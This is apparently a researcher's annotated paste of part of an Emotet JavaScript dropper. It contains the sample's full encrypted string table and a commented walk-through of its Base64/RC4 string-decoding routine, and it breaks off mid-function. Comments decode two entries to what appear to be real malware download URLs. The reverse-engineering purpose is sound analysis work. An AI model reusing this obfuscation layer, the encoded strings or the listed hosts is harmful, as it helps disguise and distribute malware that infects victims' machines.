jcarndt

Untangling javascript

May 1st, 2019
  1. //From an Emotet .js file received on 4.26.2019
  2. //SHA256 A95B13778F1D7907C0F5E836597F056BABE04CF50A24143CBD0227F595C6A9BE
  3. //The Emotet crew added a new layer of obfuscation and I was curious to see how it worked. This is heavily based upon the work done by Cofense: https://cofense.com/emotet-update-new-c2-communication-followed-new-infection-chain/
  4. //I just attempted to untangle the main decoder function.
  5. //Apologies in advance for any of my silly variable names.
  6.  
  7. var hexArray = [
  8.     '\x77\x36\x63\x35\x59\x73\x4f\x36\x44\x51\x3d\x3d',
  9.     '\x49\x77\x51\x4b\x65\x48\x2f\x43\x68\x31\x64\x65\x64\x41\x56\x4d\x63\x33\x37\x43\x70\x51\x3d\x3d',
  10.     '\x77\x37\x5a\x53\x77\x37\x6e\x44\x71\x63\x4f\x64',
  11.     '\x4e\x68\x58\x44\x71\x77\x3d\x3d',
  12.     '\x54\x43\x37\x44\x6d\x43\x76\x44\x73\x51\x3d\x3d',
  13.     '\x66\x38\x4b\x68\x77\x72\x6c\x33\x5a\x41\x3d\x3d',
  14.     '\x77\x35\x56\x76\x77\x72\x42\x33\x64\x67\x3d\x3d',
  15.     '\x58\x54\x63\x70\x77\x36\x63\x3d',
  16.     '\x62\x54\x44\x44\x71\x51\x33\x44\x6c\x51\x3d\x3d',
  17.     '\x77\x35\x55\x51\x58\x63\x4f\x35',
  18.     '\x41\x51\x59\x30\x56\x6d\x49\x3d',
  19.     '\x77\x72\x5a\x59\x46\x6d\x5a\x58\x41\x41\x3d\x3d',
  20.     '\x5a\x38\x4f\x4f\x44\x77\x54\x44\x6d\x67\x3d\x3d',
  21.     '\x46\x6d\x7a\x44\x69\x4d\x4b\x4c\x43\x63\x4b\x6e\x77\x34\x66\x44\x76\x63\x4b\x2b\x4a\x6b\x52\x45',
  22.     '\x77\x36\x7a\x43\x75\x6e\x50\x43\x71\x38\x4f\x70',
  23.     '\x45\x77\x66\x43\x71\x42\x74\x48',
  24.     '\x46\x4d\x4f\x4d\x77\x6f\x74\x48\x77\x36\x2f\x43\x75\x52\x6b\x69\x77\x71\x7a\x43\x6c\x73\x4b\x51\x77\x72\x58\x44\x73\x32\x62\x44\x6a\x38\x4b\x31',
  25.     '\x4e\x38\x4b\x31\x57\x47\x7a\x44\x6e\x41\x3d\x3d',
  26.     '\x66\x47\x30\x56\x77\x36\x55\x6e',
  27.     '\x53\x56\x59\x6e\x77\x34\x6b\x64',
  28.     '\x77\x72\x68\x4c\x63\x73\x4f\x61\x77\x36\x73\x3d',
  29.     '\x65\x4d\x4f\x55\x56\x38\x4f\x6f\x4e\x51\x3d\x3d',
  30.     '\x65\x63\x4f\x39\x77\x34\x4c\x43\x74\x73\x4b\x62',
  31.     '\x61\x63\x4b\x4b\x47\x32\x50\x43\x68\x4d\x4f\x30\x77\x72\x55\x62\x55\x77\x3d\x3d',
  32.     '\x53\x38\x4b\x6d\x77\x71\x34\x51\x49\x67\x3d\x3d',
  33.     '\x77\x72\x4c\x43\x6e\x63\x4b\x6c\x77\x36\x2f\x44\x6a\x38\x4f\x73\x77\x6f\x6b\x77\x77\x35\x6e\x44\x6d\x45\x56\x57\x49\x77\x3d\x3d',
  34.     '\x77\x6f\x4e\x4e\x52\x51\x34\x4c',
  35.     '\x77\x72\x42\x4e\x49\x38\x4f\x38\x62\x77\x3d\x3d',
  36.     '\x4c\x48\x33\x44\x6a\x38\x4b\x4c\x58\x4d\x4f\x6d\x77\x70\x76\x43\x72\x73\x4f\x4d\x63\x55\x52\x59\x61\x38\x4f\x64\x77\x6f\x77\x7a\x4f\x31\x4a\x76\x77\x72\x56\x49\x77\x34\x54\x44\x67\x38\x4f\x44\x65\x79\x62\x43\x72\x4d\x4f\x73\x77\x71\x62\x43\x6b\x63\x4f\x52\x66\x73\x4b\x38', //"http://608design.com/mainto/6Cgy/"
  37.     '\x77\x36\x31\x6b\x77\x34\x44\x44\x75\x4d\x4f\x48',
  38.     '\x77\x36\x50\x43\x73\x57\x33\x43\x71\x73\x4f\x70',
  39.     '\x4d\x30\x76\x44\x71\x63\x4f\x59\x4c\x56\x50\x44\x6d\x33\x72\x44\x67\x42\x49\x6b\x77\x37\x49\x72\x57\x46\x44\x44\x6c\x73\x4f\x73\x4e\x6e\x7a\x44\x67\x6a\x5a\x4c\x77\x36\x4d\x7a\x4d\x6c\x39\x5a\x46\x6d\x31\x45\x77\x34\x63\x78\x4c\x51\x3d\x3d', //"https://cssshk.com/wp-admin/gz56/"
  40.     '\x4c\x57\x72\x44\x76\x63\x4b\x59\x77\x34\x63\x3d',
  41.     '\x59\x42\x39\x50\x77\x35\x68\x42',
  42.     '\x4c\x73\x4b\x36\x77\x35\x4d\x64\x77\x36\x59\x3d',
  43.     '\x77\x72\x78\x48\x77\x35\x7a\x44\x6c\x56\x63\x3d',
  44.     '\x46\x77\x50\x44\x69\x44\x31\x71',
  45.     '\x4e\x79\x72\x44\x74\x43\x46\x4a',
  46.     '\x46\x44\x4c\x44\x6e\x6a\x68\x46',
  47.     '\x77\x35\x52\x32\x56\x45\x31\x76',
  48.     '\x4c\x73\x4b\x53\x77\x72\x6b\x50\x77\x72\x76\x44\x75\x6c\x35\x7a\x77\x72\x62\x44\x6f\x38\x4f\x38\x77\x36\x58\x44\x75\x33\x50\x43\x71\x63\x4f\x48\x77\x71\x6a\x43\x73\x63\x4f\x4c\x77\x6f\x55\x51\x77\x37\x6f\x62\x77\x35\x35\x36\x77\x35\x54\x44\x6a\x57\x48\x43\x75\x38\x4b\x6d\x77\x37\x59\x65\x77\x70\x55\x37\x77\x34\x62\x44\x71\x63\x4b\x53\x77\x34\x41\x54\x77\x72\x55\x48\x4b\x73\x4b\x54\x61\x52\x4c\x44\x74\x38\x4b\x75\x77\x36\x77\x46\x42\x73\x4b\x4b\x77\x6f\x72\x43\x72\x48\x51\x64\x77\x71\x68\x35\x77\x35\x66\x44\x70\x38\x4f\x45\x4f\x58\x41\x3d',
  49.     '\x65\x73\x4b\x69\x53\x4d\x4b\x2b',
  50.     '\x4c\x4d\x4b\x54\x58\x47\x73\x3d',
  51.     '\x63\x48\x41\x46\x77\x37\x55\x54',
  52.     '\x63\x73\x4b\x73\x77\x70\x35\x4e',
  53.     '\x77\x35\x77\x70\x77\x35\x5a\x70\x77\x36\x34\x3d',
  54.     '\x47\x38\x4f\x58\x77\x70\x56\x52\x77\x36\x38\x3d',
  55.     '\x56\x42\x51\x37\x77\x35\x70\x2b',
  56.     '\x4b\x38\x4f\x79\x53\x45\x44\x44\x69\x41\x3d\x3d',
  57.     '\x77\x37\x6b\x77\x77\x34\x52\x77\x77\x35\x49\x3d',
  58.     '\x4b\x38\x4f\x72\x77\x72\x39\x2b\x77\x37\x30\x3d',
  59.     '\x77\x72\x5a\x63\x47\x33\x74\x57',
  60.     '\x53\x73\x4b\x6a\x77\x72\x52\x59\x57\x41\x3d\x3d',
  61.     '\x77\x6f\x4c\x44\x6c\x38\x4b\x2f\x63\x4d\x4b\x61',
  62.     '\x77\x37\x63\x4a\x77\x35\x31\x62\x77\x34\x41\x3d',
  63.     '\x77\x36\x38\x70\x77\x37\x4e\x55\x77\x36\x55\x3d',
  64.     '\x59\x77\x6c\x4b\x77\x6f\x37\x43\x74\x51\x3d\x3d',
  65.     '\x4e\x38\x4b\x2f\x52\x6c\x6a\x44\x6e\x51\x3d\x3d',
  66.     '\x77\x6f\x66\x44\x6d\x38\x4b\x4d\x54\x63\x4b\x6d\x77\x6f\x73\x2f\x77\x71\x38\x6d\x45\x38\x4f\x74\x4a\x38\x4f\x55\x77\x70\x58\x43\x71\x56\x76\x44\x6c\x57\x72\x44\x75\x67\x3d\x3d',
  67.     '\x77\x72\x35\x52\x57\x58\x46\x4e\x48\x53\x33\x44\x72\x44\x73\x54\x77\x71\x31\x56\x57\x6a\x4a\x64\x77\x6f\x6a\x44\x6e\x77\x78\x46\x61\x43\x66\x43\x72\x38\x4f\x4c\x77\x37\x68\x6f\x77\x34\x62\x44\x72\x4d\x4f\x4a\x45\x4d\x4b\x2f\x55\x78\x38\x3d',
  68.     '\x62\x79\x39\x4e\x77\x72\x72\x43\x73\x52\x7a\x43\x76\x41\x3d\x3d',
  69.     '\x45\x63\x4f\x57\x77\x6f\x74\x58\x77\x37\x54\x43\x76\x42\x4d\x3d',
  70.     '\x77\x37\x51\x76\x77\x35\x4d\x3d',
  71.     '\x47\x54\x59\x67\x57\x77\x3d\x3d',
  72.     '\x77\x70\x54\x43\x73\x42\x6e\x43\x74\x4d\x4f\x76',
  73.     '\x77\x35\x34\x54\x77\x35\x37\x44\x69\x41\x3d\x3d',
  74.     '\x77\x35\x49\x50\x77\x34\x72\x44\x69\x4d\x4f\x47',
  75.     '\x46\x38\x4f\x42\x77\x6f\x5a\x42\x77\x36\x76\x43\x70\x42\x38\x6a\x77\x36\x49\x3d',
  76.     '\x57\x4d\x4f\x59\x77\x71\x78\x33\x42\x51\x3d\x3d',
  77.     '\x5a\x38\x4f\x59\x77\x71\x35\x68\x49\x67\x3d\x3d',
  78.     '\x66\x7a\x42\x50\x77\x71\x44\x43\x71\x67\x3d\x3d',
  79.     '\x4a\x32\x62\x44\x6c\x63\x4b\x49\x43\x63\x4b\x6c\x77\x35\x45\x3d',
  80.     '\x77\x71\x4e\x57\x49\x38\x4f\x4c\x57\x77\x3d\x3d',
  81.     '\x44\x73\x4f\x6e\x62\x58\x7a\x44\x6a\x38\x4b\x71\x47\x77\x3d\x3d',
  82.     '\x52\x63\x4f\x58\x77\x37\x76\x43\x69\x63\x4b\x4e\x77\x34\x54\x44\x6c\x4d\x4f\x72\x56\x51\x3d\x3d',
  83.     '\x77\x72\x59\x49\x77\x36\x4c\x43\x67\x58\x6b\x3d',
  84.     '\x77\x71\x5a\x44\x47\x57\x46\x4e\x48\x7a\x73\x3d',
  85.     '\x65\x73\x4b\x69\x52\x38\x4b\x6c',
  86.     '\x77\x35\x45\x55\x51\x63\x4f\x7a',
  87.     '\x4f\x4d\x4b\x4f\x77\x35\x66\x44\x76\x51\x35\x73\x77\x36\x77\x3d',
  88.     '\x77\x6f\x42\x54\x53\x73\x4f\x59\x77\x36\x67\x3d',
  89.     '\x59\x56\x68\x41\x77\x71\x76\x44\x6e\x4d\x4b\x7a\x77\x37\x51\x3d',
  90.     '\x77\x35\x52\x79\x77\x34\x6b\x3d',
  91.     '\x53\x38\x4f\x66\x4e\x52\x37\x44\x72\x77\x3d\x3d',
  92.     '\x42\x4d\x4f\x61\x77\x71\x39\x72\x77\x34\x45\x3d',
  93.     '\x4e\x68\x5a\x62\x4b\x47\x63\x3d',
  94.     '\x77\x70\x64\x6f\x66\x4d\x4f\x55\x77\x36\x59\x3d',
  95.     '\x66\x73\x4f\x62\x77\x6f\x70\x67\x4c\x41\x3d\x3d',
  96.     '\x57\x73\x4f\x52\x49\x53\x44\x44\x6f\x51\x3d\x3d',
  97.     '\x77\x6f\x64\x78\x59\x4d\x4f\x4f\x77\x36\x38\x3d',
  98.     '\x77\x70\x68\x70\x65\x67\x73\x61\x77\x36\x66\x43\x6b\x38\x4b\x35\x77\x72\x54\x44\x70\x38\x4f\x77\x77\x34\x67\x75\x53\x54\x6f\x51\x77\x71\x72\x44\x73\x4d\x4b\x6b\x43\x73\x4f\x76\x58\x73\x4f\x5a\x77\x36\x7a\x44\x67\x31\x77\x48\x4c\x73\x4b\x64\x77\x35\x45\x45\x77\x34\x56\x45\x52\x4d\x4f\x73\x66\x67\x64\x79\x77\x37\x7a\x43\x71\x56\x5a\x54\x77\x72\x48\x44\x72\x53\x4c\x44\x74\x6d\x7a\x43\x6b\x58\x46\x76\x49\x63\x4f\x79\x77\x6f\x2f\x44\x73\x43\x37\x44\x71\x31\x6e\x43\x6f\x73\x4f\x57\x77\x35\x42\x37\x47\x58\x6f\x45\x77\x72\x42\x6d\x4e\x73\x4f\x4f\x77\x72\x77\x4e\x45\x38\x4b\x52\x63\x73\x4f\x77\x4a\x77\x3d\x3d',
  99.     '\x54\x38\x4f\x48\x63\x63\x4f\x4b\x48\x51\x3d\x3d',
  100.     '\x77\x35\x48\x43\x70\x56\x33\x43\x6a\x38\x4f\x53',
  101.     '\x4f\x46\x7a\x44\x75\x63\x4f\x4a\x4d\x51\x3d\x3d',
  102.     '\x46\x63\x4b\x63\x77\x35\x63\x72\x77\x36\x59\x3d',
  103.     '\x77\x70\x74\x6e\x77\x36\x6e\x44\x6a\x33\x6b\x3d',
  104.     '\x54\x38\x4f\x6a\x77\x70\x70\x37\x43\x77\x3d\x3d',
  105.     '\x53\x4d\x4f\x62\x77\x36\x7a\x43\x6e\x4d\x4f\x48\x77\x70\x2f\x43\x6b\x73\x4f\x6c\x53\x46\x68\x62\x77\x71\x78\x51\x62\x4d\x4f\x65\x57\x38\x4b\x74\x47\x38\x4b\x35\x59\x73\x4f\x54\x61\x73\x4b\x76\x77\x34\x4c\x43\x6b\x42\x78\x68\x59\x41\x3d\x3d',
  106.     '\x58\x63\x4f\x66\x77\x6f\x46\x44\x4c\x67\x3d\x3d',
  107.     '\x77\x34\x70\x71\x52\x51\x76\x44\x67\x67\x3d\x3d',
  108.     '\x77\x37\x49\x6d\x52\x73\x4f\x53\x4f\x51\x3d\x3d',
  109.     '\x64\x33\x45\x41\x77\x37\x78\x7a\x77\x36\x4c\x44\x76\x4d\x4f\x56\x4b\x63\x4f\x68\x4f\x38\x4f\x64\x4c\x38\x4f\x72\x77\x34\x4c\x43\x6b\x6c\x66\x44\x70\x45\x31\x6a\x4c\x73\x4b\x50\x50\x63\x4f\x4d\x58\x63\x4f\x46\x77\x34\x70\x68',
  110.     '\x77\x34\x4e\x62\x66\x56\x46\x67',
  111.     '\x62\x6e\x41\x34\x77\x35\x73\x48',
  112.     '\x77\x71\x31\x58\x77\x35\x44\x44\x74\x48\x30\x3d',
  113.     '\x4c\x31\x44\x44\x74\x73\x4b\x33\x45\x77\x3d\x3d',
  114.     '\x77\x37\x70\x71\x55\x77\x50\x44\x6e\x63\x4b\x64\x77\x70\x76\x43\x69\x48\x62\x44\x6d\x6b\x6f\x71\x65\x73\x4f\x7a\x77\x72\x31\x4d\x77\x72\x50\x44\x6e\x31\x4c\x43\x6d\x63\x4b\x52\x77\x72\x2f\x43\x73\x73\x4f\x38\x77\x6f\x52\x41',
  115.     '\x44\x38\x4b\x79\x77\x37\x76\x44\x70\x79\x4d\x3d',
  116.     '\x61\x56\x77\x7a\x77\x35\x73\x37',
  117.     '\x77\x37\x39\x36\x77\x71\x78\x63\x62\x51\x3d\x3d',
  118.     '\x4a\x51\x50\x44\x76\x51\x64\x6a',
  119.     '\x48\x47\x54\x43\x76\x69\x6c\x68',
  120.     '\x77\x70\x45\x57\x43\x56\x33\x44\x6f\x63\x4b\x4c',
  121.     '\x4c\x4d\x4b\x5a\x66\x47\x76\x44\x68\x4d\x4f\x68\x77\x36\x73\x41',
  122.     '\x77\x35\x55\x41\x55\x63\x4f\x75\x46\x38\x4f\x4b',
  123.     '\x51\x44\x49\x71\x55\x41\x3d\x3d',
  124.     '\x77\x72\x64\x34\x65\x69\x67\x5a\x77\x72\x6a\x44\x6e\x38\x4f\x2f\x77\x72\x66\x44\x72\x73\x4f\x44\x77\x35\x4d\x72\x53\x79\x5a\x4d',
  125.     '\x4c\x4d\x4b\x31\x77\x35\x62\x44\x68\x51\x6b\x3d',
  126.     '\x77\x35\x58\x43\x72\x73\x4f\x51\x77\x34\x76\x43\x75\x77\x3d\x3d',
  127.     '\x42\x55\x33\x44\x74\x4d\x4b\x2f\x4a\x4d\x4f\x6e\x77\x36\x66\x44\x72\x4d\x4b\x4f\x4c\x45\x46\x51',
  128.     '\x64\x79\x39\x39\x77\x35\x64\x6e',
  129.     '\x77\x36\x7a\x43\x6e\x42\x54\x44\x75\x73\x4b\x34',
  130.     '\x4d\x31\x33\x44\x6c\x4d\x4b\x77\x44\x67\x3d\x3d',
  131.     '\x77\x34\x50\x43\x71\x55\x72\x43\x76\x63\x4b\x39\x77\x34\x5a\x59\x77\x35\x56\x46\x77\x35\x48\x43\x75\x4d\x4f\x58\x77\x72\x78\x69\x77\x37\x49\x3d',
  132.     '\x59\x4d\x4b\x38\x54\x63\x4b\x6a\x46\x67\x3d\x3d',
  133.     '\x77\x37\x45\x48\x57\x73\x4f\x70\x42\x67\x3d\x3d',
  134.     '\x66\x54\x63\x70\x77\x36\x63\x3d',
  135.     '\x77\x70\x45\x42\x77\x36\x2f\x43\x68\x33\x73\x3d',
  136.     '\x50\x4d\x4f\x48\x51\x6c\x66\x44\x70\x67\x3d\x3d',
  137.     '\x77\x37\x55\x55\x52\x63\x4f\x34\x4e\x38\x4f\x58\x77\x71\x59\x2b\x77\x36\x68\x4b',
  138.     '\x77\x36\x5a\x58\x51\x57\x4d\x3d',
  139.     '\x51\x38\x4b\x6a\x55\x73\x4b\x6a\x46\x73\x4b\x74\x77\x37\x34\x64',
  140.     '\x77\x6f\x56\x4a\x66\x4d\x4f\x2f\x77\x36\x6f\x3d',
  141.     '\x52\x38\x4f\x61\x66\x63\x4f\x56\x48\x51\x3d\x3d',
  142.     '\x54\x38\x4b\x63\x50\x78\x77\x6a',
  143.     '\x53\x73\x4f\x6c\x56\x63\x4f\x4d\x4f\x47\x4c\x44\x67\x63\x4f\x2f\x50\x44\x72\x43\x6f\x38\x4f\x6a\x77\x71\x34\x3d',
  144.     '\x54\x33\x51\x64\x77\x34\x73\x38',
  145.     '\x53\x43\x68\x65\x77\x72\x4e\x54\x77\x72\x74\x39\x48\x63\x4f\x68\x77\x72\x6a\x44\x73\x4d\x4f\x6a\x4e\x4d\x4f\x6b\x77\x35\x6e\x44\x75\x6c\x48\x44\x69\x63\x4b\x55\x77\x35\x66\x44\x71\x38\x4b\x54\x46\x4d\x4b\x6a\x77\x35\x6f\x3d',
  146.     '\x77\x72\x62\x44\x6a\x4d\x4b\x64\x57\x63\x4b\x67\x77\x6f\x42\x51\x77\x36\x55\x71\x41\x38\x4f\x67\x4d\x41\x3d\x3d',
  147.     '\x77\x35\x50\x43\x73\x73\x4f\x79\x77\x36\x48\x43\x6c\x4d\x4f\x67\x77\x34\x35\x69\x77\x72\x72\x44\x6a\x42\x46\x47\x65\x67\x3d\x3d',
  148.     '\x77\x36\x5a\x47\x56\x48\x52\x4c\x58\x73\x4b\x71\x77\x72\x49\x72\x55\x73\x4f\x72\x47\x77\x67\x71\x77\x70\x45\x68\x77\x35\x72\x44\x6d\x38\x4f\x77\x56\x4d\x4f\x50\x77\x34\x4d\x31\x55\x78\x6a\x43\x6b\x48\x62\x43\x76\x73\x4b\x5a\x57\x38\x4b\x51\x77\x37\x74\x50\x77\x6f\x6c\x55\x62\x38\x4f\x6c\x59\x73\x4f\x56\x66\x4d\x4b\x52\x42\x4d\x4b\x58\x77\x6f\x72\x44\x75\x6e\x41\x46\x57\x4d\x4f\x31\x77\x71\x64\x2f\x77\x37\x37\x43\x70\x63\x4b\x30\x77\x37\x77\x6f\x77\x71\x56\x75\x54\x32\x41\x72\x77\x34\x73\x67\x77\x6f\x5a\x57\x77\x71\x54\x43\x69\x46\x4d\x4d\x77\x36\x33\x44\x70\x63\x4f\x49\x77\x70\x2f\x43\x69\x73\x4f\x4e\x4a\x41\x48\x44\x73\x73\x4b\x6c\x77\x6f\x72\x43\x76\x6b\x66\x43\x70\x38\x4b\x33\x77\x71\x2f\x43\x6b\x67\x72\x44\x70\x63\x4b\x6c\x57\x48\x4e\x47\x49\x4d\x4f\x4c\x46\x45\x62\x44\x67\x58\x73\x6a\x4d\x4d\x4b\x64\x77\x34\x54\x43\x6c\x79\x44\x43\x6b\x73\x4f\x48\x77\x70\x52\x5a\x77\x6f\x77\x42\x77\x34\x44\x43\x70\x52\x42\x6a\x77\x6f\x73\x63\x77\x72\x77\x44\x77\x36\x72\x44\x71\x73\x4b\x32\x45\x67\x7a\x44\x76\x6a\x33\x43\x75\x42\x68\x61\x77\x6f\x54\x44\x6b\x55\x31\x41\x51\x52\x72\x43\x72\x7a\x72\x44\x6b\x63\x4f\x6d\x61\x69\x37\x43\x6d\x42\x4c\x43\x6b\x38\x4f\x2b\x77\x36\x4e\x69\x77\x35\x4d\x4c\x77\x70\x76\x43\x67\x73\x4b\x75\x64\x4d\x4b\x77\x64\x38\x4f\x67\x77\x35\x37\x44\x6f\x73\x4b\x78\x58\x45\x6e\x43\x6a\x4d\x4f\x44\x77\x71\x54\x44\x73\x4d\x4f\x48\x77\x35\x54\x44\x6a\x51\x3d\x3d',
  149.     '\x77\x72\x4d\x47\x44\x6e\x37\x44\x75\x77\x3d\x3d',
  150.     '\x5a\x73\x4b\x46\x77\x35\x34\x65\x53\x77\x3d\x3d',
  151.     '\x46\x68\x7a\x43\x74\x6a\x42\x73',
  152.     '\x49\x79\x58\x44\x6b\x51\x3d\x3d',
  153.     '\x54\x63\x4f\x34\x77\x37\x76\x43\x70\x38\x4b\x78',
  154.     '\x42\x77\x35\x2b\x41\x6e\x5a\x2b\x4d\x63\x4b\x45\x77\x35\x66\x44\x72\x38\x4f\x62\x61\x4d\x4b\x62\x77\x71\x56\x7a',
  155.     '\x77\x36\x48\x43\x67\x6b\x4c\x43\x69\x73\x4f\x2f',
  156.     '\x77\x35\x58\x43\x6e\x79\x72\x44\x76\x38\x4b\x41\x56\x57\x30\x3d',
  157.     '\x77\x6f\x58\x44\x69\x38\x4b\x2b\x61\x63\x4b\x69',
  158.     '\x49\x7a\x41\x57\x51\x48\x49\x3d',
  159.     '\x59\x63\x4b\x75\x77\x6f\x68\x4c',
  160.     '\x4a\x38\x4f\x4e\x54\x58\x6e\x44\x74\x77\x3d\x3d',
  161.     '\x77\x37\x4c\x43\x74\x7a\x50\x44\x6f\x73\x4b\x52',
  162.     '\x77\x34\x31\x73\x51\x78\x38\x3d',
  163.     '\x49\x38\x4f\x44\x61\x33\x58\x44\x71\x67\x3d\x3d',
  164.     '\x77\x72\x5a\x59\x46\x6d\x5a\x48\x50\x44\x7a\x44\x73\x69\x77\x46\x77\x72\x6f\x3d',
  165.     '\x51\x73\x4b\x77\x77\x70\x39\x59\x65\x77\x3d\x3d',
  166.     '\x77\x36\x64\x58\x77\x70\x4e\x35\x64\x73\x4b\x34',
  167.     '\x54\x38\x4f\x46\x77\x71\x4e\x6e\x46\x43\x66\x43\x6e\x57\x52\x68\x77\x36\x31\x6b',
  168.     '\x77\x37\x6c\x30\x77\x6f\x4a\x62\x56\x41\x3d\x3d',
  169.     '\x5a\x38\x4b\x35\x77\x70\x31\x56\x52\x77\x3d\x3d',
  170.     '\x42\x44\x5a\x79\x41\x56\x38\x3d',
  171.     '\x55\x4d\x4f\x61\x77\x35\x37\x43\x76\x63\x4b\x4c',
  172.     '\x77\x70\x59\x34\x55\x58\x6a\x43\x71\x38\x4f\x4d',
  173.     '\x5a\x63\x4b\x6d\x77\x6f\x4e\x4b\x53\x73\x4f\x56\x77\x71\x37\x43\x68\x58\x54\x43\x6d\x73\x4b\x53',
  174.     '\x44\x6c\x6a\x43\x6d\x77\x73\x3d',
  175.     '\x77\x37\x39\x4a\x64\x58\x4e\x76',
  176.     '\x77\x70\x62\x44\x6e\x38\x4b\x55\x56\x41\x3d\x3d',
  177.     '\x51\x63\x4f\x4d\x77\x36\x7a\x43\x68\x63\x4b\x53\x77\x35\x34\x3d',
  178.     '\x4c\x33\x58\x44\x6f\x38\x4b\x48\x77\x34\x72\x44\x6a\x56\x72\x43\x6e\x63\x4f\x78\x77\x70\x68\x42',
  179.     '\x56\x4d\x4f\x6a\x46\x54\x7a\x44\x6c\x77\x3d\x3d',
  180.     '\x53\x41\x64\x50\x77\x72\x72\x43\x75\x77\x3d\x3d',
  181.     '\x77\x35\x56\x4a\x56\x48\x51\x3d',
  182.     '\x77\x37\x56\x54\x77\x70\x46\x38\x59\x51\x3d\x3d',
  183.     '\x53\x41\x78\x43\x77\x36\x6c\x4b',
  184.     '\x64\x6a\x34\x2b\x77\x36\x68\x77'
  185. ];
  // decoder(arrayIndex, extraHex) -> decoded string for hexArray[arrayIndex].
  //   arrayIndex - index into hexArray; the call sites pass it as a hex string such as '0x1c'.
  //   extraHex   - per-call key string (written as \x escapes at the call sites).
  // Each hexArray entry is Base64 text. decodeString() below Base64-decodes it, reads the
  // resulting bytes as UTF-8, and decrypts the result with RC4 keyed by extraHex.
  // Results are cached per index in decoder['buKkqm']. The cache key does not include
  // extraHex, so a repeat call with the same index returns the first result even if a
  // different key is passed.
  // For static string recovery only hexArray and this function are needed; nothing in this
  // function performs network or file access.
  // NOTE(review): the layout (string table + atob shim + RC4, _0x-style names) resembles the
  // output of off-the-shelf JavaScript obfuscators - not confirmed from this file alone.
  186. var decoder = function (arrayIndex, extraHex) {
  187.     arrayIndex = arrayIndex - 0x0; // numeric coercion: call sites pass the index as a hex string
  188.     var indexValue = hexArray[arrayIndex]; // still-encoded table entry
  189.     if (decoder['azsjga'] === undefined) { // 'azsjga' is the "initialised" flag set at the end of this branch, so setup runs once
               // Setup step 1: locate the global object and give it an atob() if the host has none.
  190.         (function () {
  191.             var _0x30ce4e;
  192.             try {
                       // The assembled string reads: return (function() {}.constructor("return this")( ));
                       // It reaches the global object through the Function constructor.
  193.                 var _0xfb6156 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
  194.                 _0x30ce4e = _0xfb6156();
  195.             } catch (_0x181483) {
  196.                 _0x30ce4e = window; // fallback if the Function() call throws
  197.             }
  198.             var base64Chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
                   // Base64 shim, installed only when the global object has no atob.
                   // NOTE(review): presumably needed because the script targets a host without a
                   // native atob (ActiveXObject is used in getDataFromUrl) - confirm.
  199.             _0x30ce4e['atob'] || (_0x30ce4e['atob'] = function (_0x59e0a0) {
  200.                 var _0x124a74 = String(_0x59e0a0)['replace'](/=+$/, ''); // strip trailing '=' padding
                       // Each character is replaced by its index in base64Chars (a 6-bit value) and
                       // accumulated; one byte is emitted for three of every four characters.
                       // Characters not in the alphabet (indexOf returns -1) are skipped by the ~ test.
  201.                 for (var _0x1f24bd = 0x0, _0x1d00db, _0x2f8c13, _0x5c4866 = 0x0, _0x3a06ec = ''; _0x2f8c13 = _0x124a74['charAt'](_0x5c4866++); ~_0x2f8c13 && (_0x1d00db = _0x1f24bd % 0x4 ? _0x1d00db * 0x40 + _0x2f8c13 : _0x2f8c13, _0x1f24bd++ % 0x4) ? _0x3a06ec += String['fromCharCode'](0xff & _0x1d00db >> (-0x2 * _0x1f24bd & 0x6)) : 0x0) {
  202.                     _0x2f8c13 = base64Chars['indexOf'](_0x2f8c13);
  203.                 }
  204.                 return _0x3a06ec;
  205.             });
  206.         }());
               // Setup step 2: the actual string decryption routine (Base64 -> UTF-8 -> RC4).
  207.         var decodeString = function (encodedString, extraHex) {
                   // array1 = RC4 state table, var1 = RC4 index j, var2 = swap temporary, var3 = output string
  208.             var array1 = [], var1 = 0x0, var2, var3 = '', uriString = '';
  209.             encodedString = atob(encodedString); //decode the Base64 string; atob is resolved as a global, which is why the shim above is attached to the global object
  210.            
  211.             //Re-encode every character as %XX: its char code in hex (base 16), left-padded with zeros to two digits. decodeURIComponent below then interprets that byte sequence as UTF-8.
  212.             for (var count = 0x0, base64StringLength = encodedString['length']; count < base64StringLength; count++) {
  213.                 uriString += '%' + ('00' + encodedString['charCodeAt'](count)['toString'](0x10))['slice'](-0x2);
  214.             }
  215.             encodedString = decodeURIComponent(uriString);
  216.            
  217.             //RC4 state initialisation: array1[i] = i for i = 0..255 (256 entries)
  218.             for (var counter2 = 0x0; counter2 < 0x100; counter2++) {
  219.                 array1[counter2] = counter2;
  220.             }
  221.              
  222.             for (counter2 = 0x0; counter2 < 0x100; counter2++) {
  223.                 //RC4 key scheduling: var1 = (var1 + array1[i] + key character code) mod 256, where the key character is extraHex[i mod extraHex.length]; then array1[i] and array1[var1] are swapped. Runs 256 times.
  224.                 var1 = (var1 + array1[counter2] + extraHex['charCodeAt'](counter2 % extraHex['length'])) % 0x100;
  225.                 var2 = array1[counter2];
  226.                 array1[counter2] = array1[var1]; //swap, part 1: array1[i] takes the value at array1[var1]
  227.                 array1[var1] = var2; //swap, part 2: array1[var1] takes the old array1[i]
  228.             }
  229.             counter2 = 0x0; //reset index i for the keystream phase
  230.             var1 = 0x0; //reset index j for the keystream phase
  231.            
                   // RC4 keystream generation: advance i, update j, swap, then XOR each input
                   // character code with array1[(array1[i] + array1[j]) mod 256].
  232.             for (var counter3 = 0x0; counter3 < encodedString['length']; counter3++) {
  233.                 counter2 = (counter2 + 0x1) % 0x100;
  234.                 var1 = (var1 + array1[counter2]) % 0x100;
  235.                 var2 = array1[counter2];
  236.                 array1[counter2] = array1[var1];
  237.                 array1[var1] = var2;
  238.                 var3 += String['fromCharCode'](encodedString['charCodeAt'](counter3) ^ array1[(array1[counter2] + array1[var1]) % 0x100]);
  239.             }
  240.             return var3;
  241.         };
  242.         decoder['rjrlla'] = decodeString; // decryption routine, stored as a property of decoder
  243.         decoder['buKkqm'] = {}; // cache of decoded strings, keyed by arrayIndex
  244.         decoder['azsjga'] = !![]; // !![] is true: mark setup as done
  245.     }
  246.     var _0x442eaf = decoder['buKkqm'][arrayIndex]; // cached plaintext, if this index was decoded before
  247.     if (_0x442eaf === undefined) {
               // 'sDKOfx' is set here but not read anywhere in the visible code.
  248.         if (decoder['sDKOfx'] === undefined) {
  249.             decoder['sDKOfx'] = !![];
  250.         }
  251.         indexValue = decoder['rjrlla'](indexValue, extraHex); // decrypt with the per-call key
  252.         decoder['buKkqm'][arrayIndex] = indexValue; // cache by index only (key not part of the cache key)
  253.     } else {
